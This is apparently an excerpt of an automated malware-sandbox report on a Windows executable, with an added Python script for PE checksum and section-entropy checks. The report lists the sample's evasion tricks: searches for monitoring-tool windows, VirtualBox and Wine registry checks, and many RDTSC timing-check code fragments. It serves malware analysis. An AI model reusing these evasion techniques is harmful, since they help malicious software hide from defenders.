Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00984062 push 46E3323Ah; mov dword ptr [esp], eax (at 0_2_00984765)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00984062 push ebp; mov dword ptr [esp], ecx (at 0_2_0098476B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B541A6 push edx; mov dword ptr [esp], 66602EE7h (at 0_2_00B541A7)
Source: file.exe | Static PE information: section name: ceyxbmwp entropy: 7.955340871068763
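Three of the static findings in this section (the header checksum 0x1cfcb1 where 0x1d10d0 is expected, the 7.955-bit entropy of ceyxbmwp, and the unnamed and randomly named sections) come from simple computations an analyst can reproduce without a sandbox. The script below is an added example, not Joe Sandbox's code. It implements the PE CheckSum algorithm (ones'-complement sum of 16-bit words, CheckSum field skipped, folded to 16 bits, plus the file length), Shannon entropy per section, and a section-name check, and exercises them on a synthetic 256-byte image built in memory rather than on the sample itself. The standard-section list is this example's own. Caveat for triage: a wrong checksum is weak evidence on its own, since Windows only enforces it for drivers and boot-time system DLLs and many ordinary user-mode builds ship with a zero checksum; combined with near-8-bit entropy in a large, oddly named, executable-and-writable section it is a strong packing signal.

```python
"""Static checks behind three of the report's Data Obfuscation findings: PE CheckSum
recompute, section entropy, non-standard section names. Added example with a synthetic PE."""
import math
import struct

# Names a stock MSVC/MinGW build would use; anything else is worth a look (this list is the
# example's own, not an authoritative set).
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".debug"}


def checksum_field_offset(pe: bytes) -> int:
    """Offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (signature) + 20 (COFF) + 64."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return e_lfanew + 4 + 20 + 64       # same offset for PE32 and PE32+


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSumMappedFile algorithm: ones'-complement sum of 16-bit little-endian words,
    skipping the 4-byte CheckSum field itself, folded to 16 bits, plus the file length."""
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue
        total += int.from_bytes(data[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)
    if len(data) % 2:                   # trailing odd byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def verify_pe_checksum(pe: bytes):
    """Return (stored, computed); a mismatch is what the report calls an invalid checksum."""
    off = checksum_field_offset(pe)
    stored = struct.unpack_from("<I", pe, off)[0]
    return stored, pe_checksum(pe, off)


def fix_pe_checksum(pe: bytes) -> bytes:
    """Write the correct value into the header (what the linker or editbin /RELEASE does)."""
    off = checksum_field_offset(pe)
    out = bytearray(pe)
    struct.pack_into("<I", out, off, pe_checksum(pe, off))
    return bytes(out)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0; packed or encrypted sections sit near 8 like ceyxbmwp."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def nonstandard_sections(names):
    """Section names that are empty or not in the usual compiler/linker set."""
    return [n for n in names if n not in STANDARD_SECTION_NAMES]


def build_minimal_pe() -> bytes:
    """Synthetic 256-byte image: MZ stub, PE signature at 0x40, PE32 magic, bogus CheckSum.
    Not loadable; just enough header for the checks above."""
    buf = bytearray(256)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x58, 0x10B)         # optional header magic (PE32)
    struct.pack_into("<I", buf, 0x98, 0xDEADBEEF)    # deliberately wrong CheckSum
    return bytes(buf)


if __name__ == "__main__":
    pe = build_minimal_pe()
    stored, computed = verify_pe_checksum(pe)
    print(f"stored 0x{stored:x} computed 0x{computed:x} valid={stored == computed}")
    print("entropy of 0..255:", shannon_entropy(bytes(range(256))))
    print("odd sections:", nonstandard_sections(["", ".rsrc", ".idata", "", "ceyxbmwp", "arpaejxu", ".taggant"]))
```

On the synthetic image the stored 0xDEADBEEF disagrees with the computed 0xA1E8, and rewriting the field makes the two agree because the field itself is excluded from the sum. Run against a real file, the same verify_pe_checksum call reproduces the report's "real checksum vs should be" pair; the entropy of the 0x19ca00-byte ceyxbmwp section is what separates a compressed or encrypted payload from ordinary code, which typically scores well under 7.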

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (reported twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (reported twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13668)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 712147, second address: 71214D; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 push eax; 0x05 push edx; 0x06 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 88D034, second address: 88D039; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 pop edx; 0x05 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895B23, second address: 895B32; instructions: 0x00 rdtsc; 0x02 jg 00007F5E987E4116h; 0x08 pushad; 0x09 popad; 0x0a pop edx; 0x0b pop eax; 0x0c pushad; 0x0d push eax; 0x0e push edx; 0x0f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895B32, second address: 895B38; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 push eax; 0x05 push edx; 0x06 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895B38, second address: 895B45; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 jg 00007F5E987E4116h; 0x0a push ecx; 0x0b pop ecx; 0x0c popad; 0x0d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895B45, second address: 895B4A; instructions: 0x00 rdtsc; 0x02 pushad; 0x03 push eax; 0x04 push edx; 0x05 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895C76, second address: 895C94; instructions: 0x00 rdtsc; 0x02 push edi; 0x03 pop edi; 0x04 jmp 00007F5E987E4123h; 0x09 pop edx; 0x0a pop eax; 0x0b pushad; 0x0c push eax; 0x0d push edx; 0x0e pushad; 0x0f popad; 0x10 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895C94, second address: 895C98; instructions: 0x00 rdtsc; 0x02 push eax; 0x03 push edx; 0x04 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895F9B, second address: 895F9F; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 895F9F, second address: 895FAC; instructions: 0x00 rdtsc; 0x02 js 00007F5E9917DE26h; 0x08 pop edx; 0x09 pop eax; 0x0a push edx; 0x0b push eax; 0x0c push edx; 0x0d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 89796E, second address: 897977; instructions: 0x00 rdtsc; 0x02 pushad; 0x03 popad; 0x04 pop edx; 0x05 pop eax; 0x06 push eax; 0x07 push eax; 0x08 push edx; 0x09 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 897B97, second address: 897BB3; instructions: 0x00 rdtsc; 0x02 pushad; 0x03 popad; 0x04 pop edx; 0x05 pop eax; 0x06 jmp 00007F5E9917DE2Ah; 0x0b popad; 0x0c push eax; 0x0d push eax; 0x0e push edx; 0x0f jne 00007F5E9917DE28h; 0x15 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 897BB3, second address: 897BB8; instructions: 0x00 rdtsc; 0x02 pushad; 0x03 push eax; 0x04 push edx; 0x05 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 897BB8, second address: 897BE3; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 js 00007F5E9917DE26h; 0x0a popad; 0x0b pop edx; 0x0c pop eax; 0x0d nop; 0x0e add dword ptr [ebp+122D1B42h], eax; 0x14 push 00000000h; 0x16 movsx edi, bx; 0x19 call 00007F5E9917DE29h; 0x1e pushad; 0x1f push eax; 0x20 push edx; 0x21 jng 00007F5E9917DE26h; 0x27 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 897BE3, second address: 897BF0; instructions: 0x00 rdtsc; 0x02 jp 00007F5E987E4116h; 0x08 pop edx; 0x09 pop eax; 0x0a push ecx; 0x0b push eax; 0x0c push edx; 0x0d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 897BF0, second address: 897C0F; instructions: 0x00 rdtsc; 0x02 pop edx; 0x03 pop eax; 0x04 pop ecx; 0x05 popad; 0x06 push eax; 0x07 jmp 00007F5E9917DE2Fh; 0x0c mov eax, dword ptr [esp+04h]; 0x10 push eax; 0x11 push eax; 0x12 push edx; 0x13 pushad; 0x14 popad; 0x15 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: 897C0F, second address: 897C30; instructions: 0x00 rdtsc; 0x02 jnp 00007F5E987E4116h; 0x08 pop edx; 0x09 pop eax; 0x0a pop eax; 0x0b mov eax, dword ptr [eax]; 0x0d push edx; 0x0e pushad; 0x0f jng 00007F5E987E4116h; 0x15 pushad; 0x16 popad; 0x17 popad; 0x18 pop edx; 0x19 mov dword ptr [esp+04h], eax; 0x1d pushad; 0x1e push edx; 0x1f push eax; 0x20 push edx; 0x21 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C30 second address: 897C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jns 00007F5E9917DE26h 0x0000000c pop edx 0x0000000d popad 0x0000000e pop eax 0x0000000f sub dword ptr [ebp+122D198Ch], edi 0x00000015 push 00000003h 0x00000017 mov dword ptr [ebp+122D198Ch], edx 0x0000001d push 00000000h 0x0000001f add dword ptr [ebp+122D17FFh], edx 0x00000025 push 00000003h 0x00000027 adc esi, 16B3E157h 0x0000002d call 00007F5E9917DE29h 0x00000032 push edx 0x00000033 push ecx 0x00000034 push eax 0x00000035 pop eax 0x00000036 pop ecx 0x00000037 pop edx 0x00000038 push eax 0x00000039 pushad 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C71 second address: 897C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007F5E987E411Ch 0x0000000b pop esi 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 jc 00007F5E987E411Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C92 second address: 897C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9D55 second address: 8A9D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F5E987E411Dh 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B967D second address: 8B9682 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7610 second address: 8B7651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F5E987E4123h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jo 00007F5E987E4118h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7651 second address: 8B7657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B77AE second address: 8B77B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7A5C second address: 8B7A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7C54 second address: 8B7C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4120h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B809E second address: 8B80D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F5E9917DE4Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F5E9917DE26h 0x00000018 jmp 00007F5E9917DE2Dh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8649 second address: 8B8657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F5E987E4116h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889AEF second address: 889AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B903C second address: 8B9069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E987E4116h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5E987E4122h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F5E987E4116h 0x0000001a jno 00007F5E987E4116h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9069 second address: 8B906F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B906F second address: 8B9078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD0AB second address: 8BD0B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E9917DE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB72C second address: 8BB736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB736 second address: 8BB73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BBFFD second address: 8BC001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC001 second address: 8BC013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC013 second address: 8BC019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC019 second address: 8BC04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5E9917DE2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F5E9917DE26h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC04E second address: 8BC052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD191 second address: 8BD197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD197 second address: 8BD1E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F5E987E4121h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E987E4122h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD1E2 second address: 8BD1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3C9A second address: 8C3CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F5E987E4123h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3CB8 second address: 8C3CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3CCC second address: 8C3CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3E21 second address: 8C3E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5E9917DE33h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7B66 second address: 8C7BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E987E4116h 0x0000000a popad 0x0000000b add dword ptr [esp], 1E6CAA72h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F5E987E4118h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push EDFDFEDAh 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F5E987E411Ah 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7BA5 second address: 8C7BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C871A second address: 8C8720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8AD2 second address: 8C8AE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5E9917DE26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8AE3 second address: 8C8AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B90 second address: 8C8B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B94 second address: 8C8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B9A second address: 8C8B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8CB6 second address: 8C8CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA5EE second address: 8CA5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB9CD second address: 8CB9D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB9D2 second address: 8CBA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5E9917DE28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov esi, 54D03C37h 0x00000029 push 00000000h 0x0000002b mov esi, 78A01A2Ch 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F5E9917DE28h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122D21BCh] 0x00000052 or edi, dword ptr [ebp+124546C0h] 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a jl 00007F5E9917DE3Bh 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBA58 second address: 8CBA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBA5C second address: 8CBA60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBA60 second address: 8CBA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCDFA second address: 8CCE04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CE5FD second address: 8CE602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CE602 second address: 8CE608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0617 second address: 8D0638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E987E4129h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0638 second address: 8D0642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884999 second address: 8849CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F5E987E4122h 0x00000010 jmp 00007F5E987E411Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E987E4122h 0x0000001c jg 00007F5E987E4116h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8849CF second address: 8849D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1663 second address: 8D166C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D166C second address: 8D1670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1670 second address: 8D1674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2818 second address: 8D281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
